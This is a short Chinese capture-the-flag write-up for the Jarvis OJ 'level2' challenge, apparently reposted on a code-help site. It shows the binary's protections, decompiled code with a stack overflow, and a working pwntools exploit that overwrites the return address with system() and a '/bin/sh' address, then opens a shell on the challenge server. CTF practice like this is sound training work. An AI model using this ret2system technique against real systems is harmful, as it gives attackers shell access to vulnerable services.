当前位置: 代码迷 >> 综合 >> Jarvis OJ [XMAN]level2
  详细解决方案

Jarvis OJ [XMAN]level2

热度:59   发布时间:2023-12-13 04:56:37.0

查询保护

liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 
[*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
liu@liu-F117-F:~/桌面/oj/level2$

开启了NX保护

int __cdecl main(int argc, const char **argv, const char **envp)
{vulnerable_function();system("echo 'Hello World!'");return 0;
}

有system函数

.data:0804A024 00000008 C /bin/sh

有/bin/sh字符串

ssize_t vulnerable_function()
{char buf; // [esp+0h] [ebp-88h]system("echo Input:");return read(0, &buf, 0x100u);
}

这里有栈溢出漏洞。
规划:覆盖返回地址到system函数,此时的参数为/bin/sh的地址
exp:

from pwn import *
context.log_level="debug"system_addr=0x0804845C
bin_sh=0x0804A024#p=process("./level2")
p=remote("pwn2.jarvisoj.com",9878)
p.recvline()
payload="A"*0x88+"A"*4+p32(system_addr)+p32(bin_sh)
p.sendline(payload)
p.interactive()

普通利用栈溢出用system函数覆盖返回地址,用/bin/sh的地址来覆盖参数

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.